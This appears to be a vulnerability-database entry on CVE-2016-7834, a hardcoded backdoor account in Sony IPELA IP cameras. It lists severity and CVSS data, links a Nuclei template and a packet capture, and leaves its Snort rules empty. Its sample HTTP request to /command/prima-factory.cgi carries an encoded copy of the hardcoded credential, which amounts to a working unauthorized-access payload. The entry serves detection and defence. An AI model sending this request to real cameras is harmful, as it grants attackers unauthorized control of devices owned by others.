🔙 목록으로 돌아가기

CVE-2016-7834: Sony IPELA Engine IP Camera - Hardcoded Account

TitleSony IPELA Engine IP Camera - Hardcoded Account
Authoraf001
SeverityHigh
ImpactAn attacker can gain unauthorized access to the camera and potentially control its functions.
RemediationUpgrade to the latest version of the firmware provided by Sony.
CVSS Score8.8
EPSS Score0.39457
CVE IDCVE-2016-7834
CWE IDCWE-200
Tags cve2016 cve sony backdoor unauth telnet iot camera vuln

🔍 Vulnerability Description

Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.

🌐 HTTP Request

GET /command/prima-factory.cgi HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Accept: */*
Accept-Language: en
Authorization: Bearer cHJpbWFuYTpwcmltYW5h
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-7834.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-7834.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A